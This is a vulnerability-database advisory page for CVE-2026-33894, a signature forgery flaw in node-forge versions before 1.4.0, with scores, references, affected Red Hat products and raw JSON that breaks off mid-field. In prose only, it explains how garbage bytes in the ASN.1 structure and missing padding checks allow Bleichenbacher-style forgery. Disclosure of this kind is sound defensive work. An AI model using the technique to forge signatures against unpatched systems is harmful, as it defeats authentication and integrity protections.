Vulnerability-Lookup

CVE-2026-33894 (GCVE-0-2026-33894)

Vulnerability from cvelistv5 – Published: 2026-03-27 20:45 – Updated: 2026-06-30 12:07

Title

Forge has signature forgery in RSA-PKCS due to ASN.1 extra field

Summary

Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.4.0, RSASSA PKCS#1 v1.5 signature verification accepts forged signatures for low public exponent keys (e=3). Attackers can forge signatures by stuffing “garbage” bytes within the ASN structure in order to construct a signature that passes verification, enabling Bleichenbacher style forgery. This issue is similar to CVE-2022-24771, but adds bytes in an addition field within the ASN structure, rather than outside of it. Additionally, forge does not validate that signatures include a minimum of 8 bytes of padding as defined by the specification, providing attackers additional space to construct Bleichenbacher forgeries. Version 1.4.0 patches the issue.

Severity

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

SSVC

Exploitation: poc Automatable: yes Technical Impact: partial

CISA Coordinator (v2.0.3)

CWE

CWE-347 - Improper Verification of Cryptographic Signature
CWE-20 - Improper Input Validation

Assigner

GitHub_M

References

17 references

URL	Tags
https://github.com/digitalbazaar/forge/security/a…	x_refsource_CONFIRM
https://datatracker.ietf.org/doc/html/rfc2313#section-8	x_refsource_MISC
https://mailarchive.ietf.org/arch/msg/openpgp/5rn…	x_refsource_MISC
https://www.rfc-editor.org/rfc/rfc8017.html	x_refsource_MISC
https://access.redhat.com/security/cve/CVE-2026-33894	vdb-entryx_refsource_REDHAT
https://bugzilla.redhat.com/show_bug.cgi?id=2452464	issue-trackingx_refsource_REDHAT
https://security.access.redhat.com/data/csaf/v2/v…	x_sadp-csaf-vex
https://access.redhat.com/errata/RHSA-2026:24761	vendor-advisoryx_refsource_REDHAT
https://access.redhat.com/errata/RHSA-2026:9742	vendor-advisoryx_refsource_REDHAT
https://access.redhat.com/errata/RHSA-2026:13826	vendor-advisoryx_refsource_REDHAT
https://access.redhat.com/errata/RHSA-2026:22629	vendor-advisoryx_refsource_REDHAT
https://access.redhat.com/errata/RHSA-2026:21017	vendor-advisoryx_refsource_REDHAT
https://access.redhat.com/errata/RHSA-2026:24853	vendor-advisoryx_refsource_REDHAT
https://access.redhat.com/errata/RHSA-2026:19375	vendor-advisoryx_refsource_REDHAT
https://access.redhat.com/errata/RHSA-2026:22465	vendor-advisoryx_refsource_REDHAT
https://access.redhat.com/errata/RHSA-2026:22840	vendor-advisoryx_refsource_REDHAT
https://access.redhat.com/errata/RHSA-2026:23361	vendor-advisoryx_refsource_REDHAT

Impacted products

24 products

Vendor	Product	Version
digitalbazaar	forge	Affected: < 1.4.0
Red Hat	Red Hat Ansible Automation Platform 2.5 for RHEL 8	cpe:/a:redhat:ansible_automation_platform:2.5::el8 cpe:/a:redhat:ansible_automation_platform_developer:2.5::el8 cpe:/a:redhat:ansible_automation_platform_inside:2.5::el8
Red Hat	Red Hat Ansible Automation Platform 2.5 for RHEL 9	cpe:/a:redhat:ansible_automation_platform:2.5::el9 cpe:/a:redhat:ansible_automation_platform_developer:2.5::el9 cpe:/a:redhat:ansible_automation_platform_inside:2.5::el9
Red Hat	Red Hat Developer Hub 1.8	cpe:/a:redhat:rhdh:1.8::el9
Red Hat	Red Hat Developer Hub 1.9	cpe:/a:redhat:rhdh:1.9::el9
Red Hat	Red Hat Quay 3.12	cpe:/a:redhat:quay:3.12::el8
Red Hat	Red Hat Quay 3.14	cpe:/a:redhat:quay:3.14::el8
Red Hat	Red Hat Quay 3.15	cpe:/a:redhat:quay:3.15::el8
Red Hat	Red Hat Quay 3.16	cpe:/a:redhat:quay:3.16::el9
Red Hat	Red Hat Quay 3.17	cpe:/a:redhat:quay:3.17::el9
Red Hat	Red Hat Quay 3.1	cpe:/a:redhat:quay:3.10::el8
Red Hat	Red Hat Quay 3.9	cpe:/a:redhat:quay:3.9::el8
Red Hat	Logging Subsystem for Red Hat OpenShift	cpe:/a:redhat:logging:5
Red Hat	Red Hat Ansible Automation Platform 2	cpe:/a:redhat:ansible_automation_platform:2
Red Hat	Red Hat build of Apicurio Registry 2	cpe:/a:redhat:service_registry:2
Red Hat	Red Hat Build of Podman Desktop	cpe:/a:redhat:podman_desktop:1
Red Hat	Red Hat Data Grid 8	cpe:/a:redhat:jboss_data_grid:8
Red Hat	Red Hat Enterprise Linux 9	cpe:/o:redhat:enterprise_linux:9
Red Hat	Red Hat Fuse 7	cpe:/a:redhat:jboss_fuse:7
Red Hat	Cryostat 4	cpe:/a:redhat:cryostat:4
Red Hat	Red Hat build of Apache Camel - HawtIO 4	cpe:/a:redhat:apache_camel_hawtio:4
Red Hat	Red Hat Enterprise Linux 10	cpe:/o:redhat:enterprise_linux:10
Red Hat	Red Hat Enterprise Linux 8	cpe:/o:redhat:enterprise_linux:8
Red Hat	Red Hat Process Automation 7	cpe:/a:redhat:jboss_enterprise_bpms_platform:7

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-33894",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-31T14:04:30.304300Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-31T14:05:14.708Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "affected": [
          {
            "cpes": [
              "cpe:/a:redhat:ansible_automation_platform:2.5::el8",
              "cpe:/a:redhat:ansible_automation_platform_developer:2.5::el8",
              "cpe:/a:redhat:ansible_automation_platform_inside:2.5::el8"
            ],
            "defaultStatus": "affected",
            "product": "Red Hat Ansible Automation Platform 2.5 for RHEL 8",
            "vendor": "Red Hat"
          },
          {
            "cpes": [
              "cpe:/a:redhat:ansible_automation_platform:2.5::el9",
              "cpe:/a:redhat:ansible_automation_platform_developer:2.5::el9",
              "cpe:/a:redhat:ansible_automation_platform_inside:2.5::el9"
            ],
            "defaultStatus": "affected",
            "product": "Red Hat Ansible Automation Platform 2.5 for RHEL 9",
            "vendor": "Red Hat"
          },
          {
            "cpes": [
              "cpe:/a:redhat:rhdh:1.8::el9"
            ],
            "defaultStatus": "affected",
            "product": "Red Hat Developer Hub 1.8",
            "vendor": "Red Hat"
          },
          {
            "cpes": [
              "cpe:/a:redhat:rhdh:1.9::el9"
            ],
            "defaultStatus": "affected",
            "product": "Red Hat Developer Hub 1.9",
            "vendor": "Red Hat"
          },
          {
            "cpes": [
              "cpe:/a:redhat:quay:3.12::el8"
            ],
            "defaultStatus": "affected",
            "product": "Red Hat Quay 3.12",
            "vendor": "Red Hat"
          },
          {
            "cpes": [
              "cpe:/a:redhat:quay:3.14::el8"
            ],
            "defaultStatus": "affected",
            "product": "Red Hat Quay 3.14",
            "vendor": "Red Hat"
          },
          {
            "cpes": [
              "cpe:/a:redhat:quay:3.15::el8"
            ],
            "defaultStatus": "affected",
            "product": "Red Hat Quay 3.15",
            "vendor": "Red Hat"
          },
          {
            "cpes": [
              "cpe:/a:redhat:quay:3.16::el9"
            ],
            "defaultStatus": "affected",
            "product": "Red Hat Quay 3.16",
            "vendor": "Red Hat"
          },
          {
            "cpes": [
              "cpe:/a:redhat:quay:3.17::el9"
            ],
            "defaultStatus": "affected",
            "product": "Red Hat Quay 3.17",
            "vendor": "Red Hat"
          },
          {
            "cpes": [
              "cpe:/a:redhat:quay:3.10::el8"
            ],
            "defaultStatus": "affected",
            "product": "Red Hat Quay 3.1",
            "vendor": "Red Hat"
          },
          {
            "cpes": [
              "cpe:/a:redhat:quay:3.9::el8"
            ],
            "defaultStatus": "affected",
            "product": "Red Hat Quay 3.9",
            "vendor": "Red Hat"
          },
          {
            "cpes": [
              "cpe:/a:redhat:logging:5"
            ],
            "defaultStatus": "affected",
            "product": "Logging Subsystem for Red Hat OpenShift",
            "vendor": "Red Hat"
          },
          {
            "cpes": [
              "cpe:/a:redhat:ansible_automation_platform:2"
            ],
            "defaultStatus": "affected",
            "product": "Red Hat Ansible Automation Platform 2",
            "vendor": "Red Hat"
          },
          {
            "cpes": [
              "cpe:/a:redhat:service_registry:2"
            ],
            "defaultStatus": "affected",
            "product": "Red Hat build of Apicurio Registry 2",
            "vendor": "Red Hat"
          },
          {
            "cpes": [
              "cpe:/a:redhat:podman_desktop:1"
            ],
            "defaultStatus": "affected",
            "product": "Red Hat Build of Podman Desktop",
            "vendor": "Red Hat"
          },
          {
            "cpes": [
              "cpe:/a:redhat:jboss_data_grid:8"
            ],
            "defaultStatus": "affected",
            "product": "Red Hat Data Grid 8",
            "vendor": "Red Hat"
          },
          {
            "cpes": [
              "cpe:/o:redhat:enterprise_linux:9"
            ],
            "defaultStatus": "affected",
            "product": "Red Hat Enterprise Linux 9",
            "vendor": "Red Hat"
          },
          {
            "cpes": [
              "cpe:/a:redhat:jboss_fuse:7"
            ],
            "defaultStatus": "affected",
            "product": "Red Hat Fuse 7",
            "vendor": "Red Hat"
          },
          {
            "cpes": [
              "cpe:/a:redhat:cryostat:4"
            ],
            "defaultStatus": "unaffected",
            "product": "Cryostat 4",
            "vendor": "Red Hat"
          },
          {
            "cpes": [
              "cpe:/a:redhat:apache_camel_hawtio:4"
            ],
            "defaultStatus": "unaffected",
            "product": "Red Hat build of Apache Camel - HawtIO 4",
            "vendor": "Red Hat"
          },
          {
            "cpes": [
              "cpe:/o:redhat:enterprise_linux:10"
            ],
            "defaultStatus": "unaffected",
            "product": "Red Hat Enterprise Linux 10",
            "vendor": "Red Hat"
          },
          {
            "cpes": [
              "cpe:/o:redhat:enterprise_linux:8"
            ],
            "defaultStatus": "unaffected",
            "product": "Red Hat Enterprise Linux 8",
            "vendor": "Red Hat"
          },
          {
            "cpes": [
              "cpe:/a:redhat:jboss_enterprise_bpms_platform:7"
            ],
            "defaultStatus": "unaffected",
            "product": "Red Hat Process Automation 7",
            "vendor": "Red Hat"
          }
        ],
        "datePublic": "2026-03-27T20:45:49.583Z",
        "descriptions": [
          {
            "lang": "en",
            "value": "A flaw was found in Forge (also called `node-forge`), a JavaScript implementation of Transport Layer Security. A remote attacker could exploit weaknesses in the RSASSA PKCS#1 v1.5 signature verification process. By crafting malicious signatures that include extra data within the ASN structure and do not meet padding requirements, an attacker can bypass signature validation. This allows for the creation of forged signatures that appear legitimate, potentially compromising the integrity and authenticity of communications."
          }
        ],
        "metrics": [
          {
            "other": {
              "content": {
                "namespace": "https://access.redhat.com/security/updates/classification/",
                "value": "Important"
              },
              "type": "Red Hat severity rating"
            }
          },
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "NETWORK",
              "availabilityImpact": "NONE",
              "baseScore": 7.5,
              "baseSeverity": "HIGH",
              "confidentialityImpact": "NONE",
              "integrityImpact": "HIGH",
              "privilegesRequired": "NONE",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
              "version": "3.1"
            },
            "format": "CVSS"
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-347",
                "description": "Improper Verification of Cryptographic Signature",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-06-30T12:07:30.715Z",
          "orgId": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
          "shortName": "redhat-SADP"
        },
        "references": [
          {
            "tags": [
              "vdb-entry",
              "x_refsource_REDHAT"
            ],
            "url": "https://access.redhat.com/security/cve/CVE-2026-33894"
          },
          {
            "name": "RHBZ#2452464",
            "tags": [
              "issue-tracking",
              "x_refsource_REDHAT"
            ],
            "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2452464"
          },
          {
            "tags": [
              "x_sadp-csaf-vex"
            ],
            "url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-33894.json"
          },
          {
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2026:24761"
          },
          {
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2026:9742"
          },
          {
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2026:13826"
          },
          {
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2026:22629"
          },
          {
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2026:21017"
          },
          {
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2026:24853"
          },
          {
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2026:19375"
          },
          {
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2026:22465"
          },
          {
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2026:22840"
          },
          {
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2026:23361"
          }
        ],
        "solutions": [
          {
            "lang": "en",
            "value": "RHSA-2026:24761: Red Hat Ansible Automation Platform 2.5 for RHEL 8, Red Hat Ansible Automation Platform 2.5 for RHEL 9"
          },
          {
            "lang": "en",
            "value": "RHSA-2026:9742: Red Hat Developer Hub 1.8"
          },
          {
            "lang": "en",
            "value": "RHSA-2026:13826: Red Hat Developer Hub 1.9"
          },
          {
            "lang": "en",
            "value": "RHSA-2026:22629: Red Hat Quay 3.12"
          },
          {
            "lang": "en",
            "value": "RHSA-2026:21017: Red Hat Quay 3.14"
          },
          {
            "lang": "en",
            "value": "RHSA-2026:24853: Red Hat Quay 3.15"
          },
          {
            "lang": "en",
            "value": "RHSA-2026:19375: Red Hat Quay 3.16"
          },
          {
            "lang": "en",
            "value": "RHSA-2026:22465: Red Hat Quay 3.17"
          },
          {
            "lang": "en",
            "value": "RHSA-2026:22840: Red Hat Quay 3.1"
          },
          {
            "lang": "en",
            "value": "RHSA-2026:23361: Red Hat Quay 3.9"
          }
        ],
        "timeline": [
          {
            "lang": "en",
            "time": "2026-03-27T21:02:52.462Z",
            "value": "Reported to Red Hat."
          },
          {
            "lang": "en",
            "time": "2026-03-27T20:45:49.583Z",
            "value": "Made public."
          }
        ],
        "title": "node-forge: Forge: Signature Forgery via Weak RSASSA PKCS#1 v1.5 Verification",
        "workarounds": [
          {
            "lang": "en",
            "value": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability."
          }
        ],
        "x_adpType": "supplier",
        "x_generator": {
          "engine": "sadp-cli 1.0.0"
        }
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "forge",
          "vendor": "digitalbazaar",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 1.4.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.4.0, RSASSA PKCS#1 v1.5 signature verification accepts forged signatures for low public exponent keys (e=3). Attackers can forge signatures by stuffing \u201cgarbage\u201d bytes within the ASN structure in order to construct a signature that passes verification, enabling Bleichenbacher style forgery. This issue is similar to CVE-2022-24771, but adds bytes in an addition field within the ASN structure, rather than outside of it.  Additionally, forge does not validate that signatures include a minimum of 8 bytes of padding as defined by the specification, providing attackers additional space to construct Bleichenbacher forgeries. Version 1.4.0 patches the issue."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-347",
              "description": "CWE-347: Improper Verification of Cryptographic Signature",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-20",
              "description": "CWE-20: Improper Input Validation",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-27T20:45:49.583Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-ppp5-5v6c-4jwp",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-ppp5-5v6c-4jwp"
        },
        {
          "name": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-ppp5-5v6c-4jwp",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-ppp5-5v6c-4jwp"
        },
        {
          "name": "https://datatracker.ietf.org/doc/html/rfc2313#section-8",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://datatracker.ietf.org/doc/html/rfc2313#section-8"
        },
        {
          "name": "https://mailarchive.ietf.org/arch/msg/openpgp/5rnE9ZRN1AokBVj3VqblGlP63QE",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://mailarchive.ietf.org/arch/msg/openpgp/5rnE9ZRN1AokBVj3VqblGlP63QE"
        },
        {
          "name": "https://www.rfc-editor.org/rfc/rfc8017.html",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.rfc-editor.org/rfc/rfc8017.html"
        }
      ],
      "source": {
        "advisory": "GHSA-ppp5-5v6c-4jwp",
        "discovery": "UNKNOWN"
      },
      "title": "Forge has signature forgery in RSA-PKCS due to ASN.1 extra field"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-33894",
    "datePublished": "2026-03-27T20:45:49.583Z",
    "dateReserved": "2026-03-24T15:41:47.489Z",
    "dateUpdated": "2026-06-30T12:07:30.715Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-33894",
      "date": "2026-06-30",
      "epss": "0.00339",
      "percentile": "0.25704"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-33894\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-27T21:17:25.983\",\"lastModified\":\"2026-06-30T03:18:45.717\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.4.0, RSASSA PKCS#1 v1.5 signature verification accepts forged signatures for low public exponent keys (e=3). Attackers can forge signatures by stuffing \u201cgarbage\u201d bytes within the ASN structure in order to construct a signature that passes verification, enabling Bleichenbacher style forgery. This issue is similar to CVE-2022-24771, but adds bytes in an addition field within the ASN structure, rather than outside of it.  Additionally, forge does not validate that signatures include a minimum of 8 bytes of padding as defined by the specification, providing attackers additional space to construct Bleichenbacher forgeries. Version 1.4.0 patches the issue.\"}],\"affected\":[{\"source\":\"security-advisories@github.com\",\"affectedData\":[{\"vendor\":\"digitalbazaar\",\"product\":\"forge\",\"versions\":[{\"version\":\"\u003c 1.4.0\",\"status\":\"affected\"}]}]},{\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\",\"affectedData\":[{\"vendor\":\"Red Hat\",\"product\":\"Red Hat Ansible Automation Platform 2.5 for RHEL 8\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:ansible_automation_platform:2.5::el8\",\"cpe:/a:redhat:ansible_automation_platform_developer:2.5::el8\",\"cpe:/a:redhat:ansible_automation_platform_inside:2.5::el8\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat Ansible Automation Platform 2.5 for RHEL 9\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:ansible_automation_platform:2.5::el9\",\"cpe:/a:redhat:ansible_automation_platform_developer:2.5::el9\",\"cpe:/a:redhat:ansible_automation_platform_inside:2.5::el9\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat Developer Hub 1.8\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:rhdh:1.8::el9\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat Developer Hub 1.9\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:rhdh:1.9::el9\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat Quay 3.12\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:quay:3.12::el8\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat Quay 3.14\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:quay:3.14::el8\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat Quay 3.15\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:quay:3.15::el8\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat Quay 3.16\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:quay:3.16::el9\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat Quay 3.17\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:quay:3.17::el9\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat Quay 3.1\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:quay:3.10::el8\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat Quay 3.9\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:quay:3.9::el8\"]},{\"vendor\":\"Red Hat\",\"product\":\"Logging Subsystem for Red Hat OpenShift\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:logging:5\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat Ansible Automation Platform 2\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:ansible_automation_platform:2\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat build of Apicurio Registry 2\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:service_registry:2\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat Build of Podman Desktop\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:podman_desktop:1\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat Data Grid 8\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:jboss_data_grid:8\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat Enterprise Linux 9\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/o:redhat:enterprise_linux:9\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat Fuse 7\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:jboss_fuse:7\"]},{\"vendor\":\"Red Hat\",\"product\":\"Cryostat 4\",\"defaultStatus\":\"unaffected\",\"cpes\":[\"cpe:/a:redhat:cryostat:4\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat build of Apache Camel - HawtIO 4\",\"defaultStatus\":\"unaffected\",\"cpes\":[\"cpe:/a:redhat:apache_camel_hawtio:4\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat Enterprise Linux 10\",\"defaultStatus\":\"unaffected\",\"cpes\":[\"cpe:/o:redhat:enterprise_linux:10\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat Enterprise Linux 8\",\"defaultStatus\":\"unaffected\",\"cpes\":[\"cpe:/o:redhat:enterprise_linux:8\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat Process Automation 7\",\"defaultStatus\":\"unaffected\",\"cpes\":[\"cpe:/a:redhat:jboss_enterprise_bpms_platform:7\"]}]}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6},{\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}],\"ssvcV203\":[{\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"ssvcData\":{\"timestamp\":\"2026-03-31T14:04:30.304300Z\",\"id\":\"CVE-2026-33894\",\"options\":[{\"exploitation\":\"poc\"},{\"automatable\":\"yes\"},{\"technicalImpact\":\"partial\"}],\"role\":\"CISA Coordinator\",\"version\":\"2.0.3\"}}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-20\"},{\"lang\":\"en\",\"value\":\"CWE-347\"}]},{\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-347\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:digitalbazaar:forge:*:*:*:*:*:node.js:*:*\",\"versionEndExcluding\":\"1.4.0\",\"matchCriteriaId\":\"824A6B69-D102-48A0-B8F2-24DEC4D749DD\"}]}]}],\"references\":[{\"url\":\"https://datatracker.ietf.org/doc/html/rfc2313#section-8\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://github.com/digitalbazaar/forge/security/advisories/GHSA-ppp5-5v6c-4jwp\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"https://github.com/digitalbazaar/forge/security/advisories/GHSA-ppp5-5v6c-4jwp\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"https://github.com/digitalbazaar/forge/security/advisories/GHSA-ppp5-5v6c-4jwp\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"https://github.com/digitalbazaar/forge/security/advisories/GHSA-ppp5-5v6c-4jwp\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"https://github.com/digitalbazaar/forge/security/advisories/GHSA-ppp5-5v6c-4jwp\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"https://github.com/digitalbazaar/forge/security/advisories/GHSA-ppp5-5v6c-4jwp\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"https://github.com/digitalbazaar/forge/security/advisories/GHSA-ppp5-5v6c-4jwp\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"https://github.com/digitalbazaar/forge/security/advisories/GHSA-ppp5-5v6c-4jwp\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"https://mailarchive.ietf.org/arch/msg/openpgp/5rnE9ZRN1AokBVj3VqblGlP63QE\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://www.rfc-editor.org/rfc/rfc8017.html\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Third Party 